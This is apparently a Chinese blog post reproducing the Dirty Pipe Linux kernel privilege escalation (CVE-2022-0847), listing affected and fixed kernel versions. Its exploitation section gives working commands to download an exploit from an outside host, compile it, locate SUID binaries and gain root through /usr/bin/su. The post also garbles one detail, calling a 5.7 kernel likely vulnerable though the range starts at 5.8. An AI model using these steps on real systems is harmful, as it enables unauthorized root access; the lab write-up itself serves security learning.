Dirty Pipe脏管道提权漏洞复现(CVE-2022-0847)

最新推荐文章于 2024-06-03 09:30:15 发布
最新推荐文章于 2024-06-03 09:30:15 发布
阅读量787 收藏
点赞数
分类专栏: 权限提升 文章标签: 安全 网络 linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35258863/article/details/130523159
版权

TOC

0x001 漏洞描述?

CVE-2022-0847是自 5.8 以来 Linux 内核中的一个漏洞,攻击者利用该漏洞可以覆盖任意只读文件中的数据。这样将普通的权限提升至root权限,因为非特权进程可以将代码注入到根进程。

0x002 受影响版本

5.8<=Linux kernel<5.16.11/5.15.25/5.10.102

0x003 漏洞靶场搭建

kali主机可以测试
5.8<=Linux kernel<5.16.11/5.15.25/5.10.102
符合即可

  • Ubuntu 16.04 或 18.04(推荐)
  • kali2022或者更低版本

0x004 复现步骤

1.漏洞发现

可以看到系统内核 5.7 ,说明可能存在脏管道漏洞

uname -srm

image-20230506105830947

2.漏洞利用
wget https://haxx.in/files/dirtypipez.c    //下载
gcc -o dirtypipez dirtypipez.c    //编译
find / -user root -perm -4000 -print 2>/dev/null   /探针具有 SUID 权限的可执行文件,然后在利用提权

探针出很多个suid可执行文件,随意选择一个即可

image-20230506110943888

./dirtypipez /usr/bin/su
id

image-20230506111132909

0x005 修复建议

更新升级 Linux 内核到以下安全版本:

  • Linux 内核 >= 5.16.11
  • Linux 内核 >= 5.15.25
  • Linux 内核 >= 5.10.102

0x006 总结

攻击者通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root

这个漏洞作者将其命名为了 Dirty Pipe(脏管道),一看到这名字讲道理就让人想到了 Dirty Cow(脏牛),这是因为该漏洞的原理比较类似于 Dirty Cow,但这个漏洞更容易被利用。

小千超人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Dirty Pipe 漏洞CVE-2022-0847复现
safehao的博客
03-10 2195
Dirty Pipe 漏洞CVE-2022-0847复现 2022年3月7日Max Kellermann max.kellermann@ionos.com发布关于[The Dirty Pipe Vulnerablity](The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation (cm4all.com))的文章。描述了关于该漏洞的发现过程以及POC。Dirty Pipe漏洞类似于Dirty Cow漏洞,该漏洞允许改
新版Linux内核提权漏洞CVE-2022-0847
03-09
5.8 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
Linux内核提权漏洞(Dirty-pipe)复现_linux提权漏洞
xnxqwzy的博客
10-08 404
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847漏洞原理类似于 CVE-2016-5195 漏洞Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
DirtyPipe(CVE-2022-0847) 漏洞复现分析
Zyecho的博客
07-20 4136
本实验详细记录了DirtyPipe(CVE-2022-0847) 漏洞的分析和复现
推荐篇:DirtyPipeRoot —— 开启你的安卓设备临时超级权限之旅
最新发布
gitblog_00020的博客
06-03 682
推荐篇:DirtyPipeRoot —— 开启你的安卓设备临时超级权限之旅 项目地址:https://gitcode.com/tiann/DirtyPipeRoot 在安卓开发与黑客文化交织的领域,总有那么几项技术能让人眼前一亮,今天我们要探讨的正是这样一个强大而大胆的开源项目——DirtyPipeRoot。 项目介绍 DirtyPipeRoot,基于知名的安全研究漏洞 Dirty Pipe(由...
DirtyPipe(管道)提权
weixin_45794666的博客
03-08 6664
DirtyPipe提权 CVE-2022-0847 漏洞详情 新管道缓冲区结构的“flags”成员在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化的方式存在缺陷,因此可能包含陈旧的值。非特权本地用户可通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847漏洞原理类似于 CVE-2016-5195 漏洞Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Di
【墨菲安全实验室】“Dirty Pipe”的故事-Linux 内核提权漏洞CVE-2022-0847
murphysec的博客
03-09 4827
漏洞简述 3月7日,开发者 Max Kellermann 在他的博客(https://dirtypipe.cm4all.com/)中披露了一个能导致 Linux 权限提升的漏洞,编号为 CVE-2022-0847,他称之为 “The Dirty Pipe Vulnerability” (“管道漏洞)。 Linux 5.10版本前的一次 commit 中,重构了匿名管道缓冲区的代码,修改了“可合并”检查的逻辑,这个修改造成了通过匿名管道覆盖任意只读文件的漏洞,攻击者可以利用该漏洞进行本地权限提升。
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
Dirty Pipe 漏洞原理
safehao的博客
03-10 1440
本文只是根据dirty pipe英文文章进行翻译,文中的错误指出还望见谅
Linux-dirty pipe内核提权漏洞复现-编号:CVE-2022-0847
╲ゞ紅桃K
08-31 1301
漏洞属于Linux提权漏洞, 攻击者可利用该漏洞使任何非特权(本地)用户在易受攻击的主机上获得root权限,非特权进程可以将代码注入到根进程使得攻击者可获取服务器的所有权限。与该漏洞CVE-2022-0847(Dirty Pipe)类似的另一个漏洞CVE-2016-5195 “Dirty Cow”(提权),很多人应该了解并且能利用该漏洞。...
linux提权dirtycow
qq_62370574的博客
01-20 1026
漏洞是一种影响Linux操作系统的本地特权升级漏洞,其全称为"Copy-On-Write"(写时复制)漏洞。这个漏洞在2016年被公开,并且影响了大量的Linux内核版本。Dirty COW漏洞的根本原因是在Linux在竞态条件下的机制的实现存在缺陷。Copy-On-Write是一种内存管理技术,它允许多个进程共享同一个物理内存页面的副本,直到其中一个进程尝试修改该页面时,系统才会复制出一个新的页面供修改进程使用。是多个并发操作或线程访问共享资源时可能出现的一种问题。
[VulnHub靶机渗透] 常用的linux提权方法——提权 dirty.c
人若无名,便可专心练剑
02-21 972
牛(Dirty COW)是一个 Linux 内核漏洞,其全名为 “Copy-On-Write”。该漏洞在 2016 年首次公开,并且被广泛用于 Linux 系统上的提权攻击。漏洞允许攻击者利用内核中对于 “Copy-On-Write” 内存管理的一个缺陷来获取 root 权限。
CVE-2022-0847 DirtyPipe 提权漏洞 复现
god_Zeo的安全博客
03-08 4791
0x00 介绍 DirtyPipe (CVE-2022-0847) 是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。 其要求内核是5.8以上的才能利用 相关链接: 原文地址:https://dirtypipe.cm4all.com/ 准备 创建一个低权限用户 我的环境是docker里面 uname -a Linux ae801d08733b 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64 x86_64
详细|Linux提权总结
st3pby的博客
11-06 7775
Linux提权总结
Linux DirtyPipe内核提权漏洞CVE-2022-0847
chaojixiaojingang
03-11 9515
1.漏洞描述 CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847漏洞原理类似于 CVE-2016-5195 漏洞Dirty Cow),但它更容易被利用。 2.漏洞影响范围 linux内核5.8及之后的版本 PS:该漏洞已 在 Linux 5.16.11、5.15.25 和 5.10.102 中修复 3.漏洞环境...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值